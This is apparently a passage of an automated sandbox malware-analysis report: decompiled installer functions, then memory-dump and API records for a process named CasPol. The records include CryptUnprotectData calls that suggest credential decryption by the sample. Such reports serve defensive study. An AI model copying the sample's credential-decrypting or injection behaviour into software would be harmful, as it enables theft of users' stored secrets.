                                                                                      • Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
                                                                                      • Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                                                      • Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 89%
                                                                                      			E00405513(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                      				int _t15;
                                                                                      				long _t16;
                                                                                      
                                                                                      				_t15 = _a8;
                                                                                      				if(_t15 != 0x102) {
                                                                                      					if(_t15 != 0x200) {
                                                                                      						_t16 = _a16;
                                                                                      						L7:
                                                                                      						if(_t15 == 0x419 &&  *0x42d254 != _t16) {
                                                                                      							_push(_t16);
                                                                                      							_push(6);
                                                                                      							 *0x42d254 = _t16;
                                                                                      							E00404ED4();
                                                                                      						}
                                                                                      						L11:
                                                                                      						return CallWindowProcW( *0x42d25c, _a4, _t15, _a12, _t16);
                                                                                      					}
                                                                                      					if(IsWindowVisible(_a4) == 0) {
                                                                                      						L10:
                                                                                      						_t16 = _a16;
                                                                                      						goto L11;
                                                                                      					}
                                                                                      					_t16 = E00404E54(_a4, 1);
                                                                                      					_t15 = 0x419;
                                                                                      					goto L7;
                                                                                      				}
                                                                                      				if(_a12 != 0x20) {
                                                                                      					goto L10;
                                                                                      				}
                                                                                      				E004044E5(0x413);
                                                                                      				return 0;
                                                                                      			}






                                                                                      APIs
                                                                                      • IsWindowVisible.USER32(?), ref: 00405542
                                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 00405593
                                                                                        • Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                      • String ID:
                                                                                      • API String ID: 3748168415-3916222277
                                                                                      • Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                                                      • Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
                                                                                      • Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                                                      • Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00403B57() {
                                                                                      				void* _t2;
                                                                                      				void* _t3;
                                                                                      				void* _t6;
                                                                                      				void* _t8;
                                                                                      
                                                                                      				_t8 =  *0x42b22c;
                                                                                      				_t3 = E00403B3C(_t2, 0);
                                                                                      				if(_t8 != 0) {
                                                                                      					do {
                                                                                      						_t6 = _t8;
                                                                                      						_t8 =  *_t8;
                                                                                      						FreeLibrary( *(_t6 + 8));
                                                                                      						_t3 = GlobalFree(_t6);
                                                                                      					} while (_t8 != 0);
                                                                                      				}
                                                                                      				 *0x42b22c =  *0x42b22c & 0x00000000;
                                                                                      				return _t3;
                                                                                      			}








                                                                                      APIs
                                                                                      • FreeLibrary.KERNEL32(?,75A43420,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
                                                                                      • GlobalFree.KERNEL32(?), ref: 00403B78
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free$GlobalLibrary
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 1100898210-3355392842
                                                                                      • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                                      • Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
                                                                                      • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                                      • Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00405F92(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                                                      				int _v8;
                                                                                      				int _t12;
                                                                                      				int _t14;
                                                                                      				int _t15;
                                                                                      				CHAR* _t17;
                                                                                      				CHAR* _t27;
                                                                                      
                                                                                      				_t12 = lstrlenA(_a8);
                                                                                      				_t27 = _a4;
                                                                                      				_v8 = _t12;
                                                                                      				while(lstrlenA(_t27) >= _v8) {
                                                                                      					_t14 = _v8;
                                                                                      					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                                                      					_t15 = lstrcmpiA(_t27, _a8);
                                                                                      					_t27[_v8] =  *(_t14 + _t27);
                                                                                      					if(_t15 == 0) {
                                                                                      						_t17 = _t27;
                                                                                      					} else {
                                                                                      						_t27 = CharNextA(_t27);
                                                                                      						continue;
                                                                                      					}
                                                                                      					L5:
                                                                                      					return _t17;
                                                                                      				}
                                                                                      				_t17 = 0;
                                                                                      				goto L5;
                                                                                      			}










                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBA
                                                                                      • CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                      • String ID:
                                                                                      • API String ID: 190613189-0
                                                                                      • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                      • Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
                                                                                      • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                      • Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Execution Graph

                                                                                      Execution Coverage:20%
                                                                                      Dynamic/Decrypted Code Coverage:99.1%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:226
                                                                                      Total number of Limit Nodes:23
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30926583691.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1270000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d9bc88e65982beb234f269eac81eee41ccca7fa9d33fb01313526536e85ec0f5
                                                                                      • Instruction ID: a2bdd1b78419e328901dfad05a522c1ce0027d450522525aadd74db3967ecaa8
                                                                                      • Opcode Fuzzy Hash: d9bc88e65982beb234f269eac81eee41ccca7fa9d33fb01313526536e85ec0f5
                                                                                      • Instruction Fuzzy Hash: E9631E31D1075A8ECB11EF68C884699F7B1FF99310F15D69AE55C6B221EB30AAC4CF81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30926583691.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1270000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e75cccdf1417694984d9a7a29cdf9ca5684f86265b6d605b732f95b9dba09071
                                                                                      • Instruction ID: 66d2d5eb01e9f189b4c265dc17191167a052cf3593567cefcca275ac52da59a9
                                                                                      • Opcode Fuzzy Hash: e75cccdf1417694984d9a7a29cdf9ca5684f86265b6d605b732f95b9dba09071
                                                                                      • Instruction Fuzzy Hash: 9D63EA30D10A5A8ECB11EF68C884699F7B1FF99310F15D79AE55C67221EB70AAC4CF81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 7aeeed58cf6dc500a809573f3fabe3564c4b82f24bb975119ae1f861c0563bee
                                                                                      • Instruction ID: 923bd61599237472aa72c1fa349c79c0e77f708040032efffa2ecb3398337028
                                                                                      • Opcode Fuzzy Hash: 7aeeed58cf6dc500a809573f3fabe3564c4b82f24bb975119ae1f861c0563bee
                                                                                      • Instruction Fuzzy Hash: 46A219B4A01224CFCB65EF64C88879DBBB6BF88305F5084EAD50AA3344DB355E85CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30928978761.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1760000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 713edcb7d19a9d2a19b20e008ebac9bd8bb9766df0f7177dcfec91f35820ae20
                                                                                      • Instruction ID: 55e973dbe655b94a0c024e2ad9d3f25580d6e117a516fcf29f4c0c11e3c5e465
                                                                                      • Opcode Fuzzy Hash: 713edcb7d19a9d2a19b20e008ebac9bd8bb9766df0f7177dcfec91f35820ae20
                                                                                      • Instruction Fuzzy Hash: 12F18030A00219CFDB14CFA9C944B9DFBF5BF88308F158159DA19AF2A1DB75E945CB41
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • TerminateThread.KERNEL32(6B396C6F,D9A09985), ref: 0111263C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30926261275.0000000001112000.00000040.00000400.00020000.00000000.sdmp, Offset: 01112000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1112000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: TerminateThread
                                                                                      • String ID:
                                                                                      • API String ID: 1852365436-0
                                                                                      • Opcode ID: 4d178bd6388eebd7b79305f4f2d12fbf351e8d7b9a909f5c2992593214f6445c
                                                                                      • Instruction ID: c8c0374d691a919535ffc4cc5aac6a93399e000cdd995da69fc4a02d8626def7
                                                                                      • Opcode Fuzzy Hash: 4d178bd6388eebd7b79305f4f2d12fbf351e8d7b9a909f5c2992593214f6445c
                                                                                      • Instruction Fuzzy Hash: B441F8757043029FDF38DE28C5A47DB73E29F95760F698079DC498B16AE3358485CA06
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 01513565
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30928440351.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1510000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: CryptDataUnprotect
                                                                                      • String ID:
                                                                                      • API String ID: 834300711-0
                                                                                      • Opcode ID: d8c5baaaff8e216d9034cc0e0998910cc00e085eab62879fb34bb7c8a566a2a1
                                                                                      • Instruction ID: 2e6ecba3c04440a1b2faaddac5f68a1b202608186e6274bdea20a4f3a82f5946
                                                                                      • Opcode Fuzzy Hash: d8c5baaaff8e216d9034cc0e0998910cc00e085eab62879fb34bb7c8a566a2a1
                                                                                      • Instruction Fuzzy Hash: DD1156B68002099FDB10CF99C844BDEBFF4FF48720F158419E614A7251C339AA50DFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 01513565
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30928440351.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1510000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: CryptDataUnprotect
                                                                                      • String ID:
                                                                                      • API String ID: 834300711-0
                                                                                      • Opcode ID: 028ba85f013d3fffc720f8732b7b8d4d0bb4b97204cd454ef5817e47665afccc
                                                                                      • Instruction ID: e1318fc68ea323e1d4e8f7d96eef167587edd9fd4ac52a3b06b9b41b782f3622
                                                                                      • Opcode Fuzzy Hash: 028ba85f013d3fffc720f8732b7b8d4d0bb4b97204cd454ef5817e47665afccc
                                                                                      • Instruction Fuzzy Hash: E11156B68002499FDB10CF99C844BDEBFF4FF48720F158419EA54AB201C379A950DFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30926583691.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1270000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e915d4604cef61439c919871aa1764bc39a1ed7c0ea44a7f6a11d993e03ea881
                                                                                      • Instruction ID: 6806c038f0aa409df3e7590e31d05d20f9c5d89a4e01e6cdd1bda1276941ed1b
                                                                                      • Opcode Fuzzy Hash: e915d4604cef61439c919871aa1764bc39a1ed7c0ea44a7f6a11d993e03ea881
                                                                                      • Instruction Fuzzy Hash: C9112B35B002299FCB40DBBCC8895AEB7F5FB8C3517108469E51AD3710EF396D168B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32 ref: 1D7AA386
                                                                                      • GetCurrentThread.KERNEL32 ref: 1D7AA3C3
                                                                                      • GetCurrentProcess.KERNEL32 ref: 1D7AA400
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 1D7AA459
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30950946220.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1d7a0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: Current$ProcessThread
                                                                                      • String ID:
                                                                                      • API String ID: 2063062207-0
                                                                                      • Opcode ID: 6f8ac1db278ff9be4dfc285962cb41a1d99d07dbef4324e6f1b63749e06439e8
                                                                                      • Instruction ID: 837c31c0753a5482d9c1dc5898afa42a2dcf06b5f9ed8a62dc88156322b33191
                                                                                      • Opcode Fuzzy Hash: 6f8ac1db278ff9be4dfc285962cb41a1d99d07dbef4324e6f1b63749e06439e8
                                                                                      • Instruction Fuzzy Hash: 4D518CB0D00609CFDB00DFA9C588BEEBBF0AF48314F248519E119A7350D73AA944CF66
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • OleInitialize.OLE32(00000000), ref: 01768DAD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30928978761.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1760000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: Initialize
                                                                                      • String ID: \
                                                                                      • API String ID: 2538663250-2967466578
                                                                                      • Opcode ID: c4c73d25e67b854d0fb84671073500b354fdeabd10f88bb8505e4da1fc831c10
                                                                                      • Instruction ID: 9ab13a2a99570e679ede5290fbab80c0e87c9803d625e888e7b6e1602e9b0c61
                                                                                      • Opcode Fuzzy Hash: c4c73d25e67b854d0fb84671073500b354fdeabd10f88bb8505e4da1fc831c10
                                                                                      • Instruction Fuzzy Hash: DF618C74A00319CFDB10CFA9C844AAFBBFAAF88314F158469D915AB340D735E945CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 1ce384aa722c6393974fd872902902edd9ac23fb382c5364a814b82060818b22
                                                                                      • Instruction ID: c7334c6ae5ffda943196a8cd0864e9b32d06a547f9ae0d2100632867b74f1b0c
                                                                                      • Opcode Fuzzy Hash: 1ce384aa722c6393974fd872902902edd9ac23fb382c5364a814b82060818b22
                                                                                      • Instruction Fuzzy Hash: 92623AB4A01328CFCB65EF64C98869DBBB6BF88305F5084EAD50AA3344DB355E91CF45
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: eeaf8d68bbf7cf143f35404739d1ca16f7fcedaeb8ee92cc539c16ae0c5c1c14
                                                                                      • Instruction ID: 56656ac270a05f4685560ce1dc3795654253987d3fe3030ad2253ca950ceea87
                                                                                      • Opcode Fuzzy Hash: eeaf8d68bbf7cf143f35404739d1ca16f7fcedaeb8ee92cc539c16ae0c5c1c14
                                                                                      • Instruction Fuzzy Hash: 10623AB4A01328CFCB65EF64C98869DBBB6BF88305F5084EAD50AA3344DB355E91CF45
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: d740b00588acb7d35cff14fa2d51250e1f67be15b53a4df20873ed1e020865af
                                                                                      • Instruction ID: 2cb0ac96d4bf4ce29335ae6fe5e8755bfd49fe35af23199dc6f670b44324852c
                                                                                      • Opcode Fuzzy Hash: d740b00588acb7d35cff14fa2d51250e1f67be15b53a4df20873ed1e020865af
                                                                                      • Instruction Fuzzy Hash: 23623AB4A01328CFCB65EF64C98869DBBB6BF88305F5084EAD50AA3344DB355E91CF45
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 2b135ac41fcd4168cc43c04a18a23ad44b903fb8ac5c8a920d5ffd7b20dab69c
                                                                                      • Instruction ID: 70d8096b74e2aa26e20bf23ee9e46ead6782f7ce978795c7215a1157fe6e2008
                                                                                      • Opcode Fuzzy Hash: 2b135ac41fcd4168cc43c04a18a23ad44b903fb8ac5c8a920d5ffd7b20dab69c
                                                                                      • Instruction Fuzzy Hash: 2B523AB4A01328CFCB65EF64C88869DBBB6BF88305F5084EAD50AA3344DB355E91CF45
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 0a07ccc1286ca723d084846ab62040c6eb5cddb9d5788bfdf9a761753f28a7eb
                                                                                      • Instruction ID: 9c50edf981adf87abe831bd84055da4ed90004fb217ed204a0befa16c854ca63
                                                                                      • Opcode Fuzzy Hash: 0a07ccc1286ca723d084846ab62040c6eb5cddb9d5788bfdf9a761753f28a7eb
                                                                                      • Instruction Fuzzy Hash: 94523AB4A01328CFCB65EF64C98869DBBB6BF88305F5084EAD50AA3344DB355E91CF45
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: de7e477de0f012dcbaa07a1d7d78057cfd015d0c1bde527cfd4b5841d5d3fbfc
                                                                                      • Instruction ID: f25b656537368d0ac50ea4b1f5314891ac60b9035245d57ace1771ce113e1ad2
                                                                                      • Opcode Fuzzy Hash: de7e477de0f012dcbaa07a1d7d78057cfd015d0c1bde527cfd4b5841d5d3fbfc
                                                                                      • Instruction Fuzzy Hash: 5C523AB4A00328CFCB65EF64C98869DBBB6BF88305F5084EAD50AA3344DB355E91CF45
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: d377e20742bc2d9c026b89e5d02f0fb17cb5dbf6489872de241597b445e93d62
                                                                                      • Instruction ID: 574ecfa2a83cc12d5ac219809005d7789596baf60eeab8cb57b1b2b8e190c847
                                                                                      • Opcode Fuzzy Hash: d377e20742bc2d9c026b89e5d02f0fb17cb5dbf6489872de241597b445e93d62
                                                                                      • Instruction Fuzzy Hash: 3F523AB4A01328CFCB65EF64C98869DBBB6BF88305F5084EAD50AA3344DB355E91CF45
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: f4914b7dc6fdcfb7da5518e8471f596dc455ab2b571b355dcb99be38564a2bac
                                                                                      • Instruction ID: 9bc90c928e35e27ad244bddcb40b516c4cba9622d74aa108eb66d9998ce05074
                                                                                      • Opcode Fuzzy Hash: f4914b7dc6fdcfb7da5518e8471f596dc455ab2b571b355dcb99be38564a2bac
                                                                                      • Instruction Fuzzy Hash: B9523AB4A00328CFCB65DF64C98869DBBB6BF88305F5084EAD50AA3344DB355E91CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 10ea04f820e49b8e371020df755fc7fae566dbc227b67125d0f6df4d20c6d176
                                                                                      • Instruction ID: 780e356b84b26f7658aaa20bb1f5f90bd308ea48315769de6f316fedbb8cdcb4
                                                                                      • Opcode Fuzzy Hash: 10ea04f820e49b8e371020df755fc7fae566dbc227b67125d0f6df4d20c6d176
                                                                                      • Instruction Fuzzy Hash: 6E523AB4A00328CFCB65DF64C98869DBBB6BF88305F5084EAD50AA3344DB359E91CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
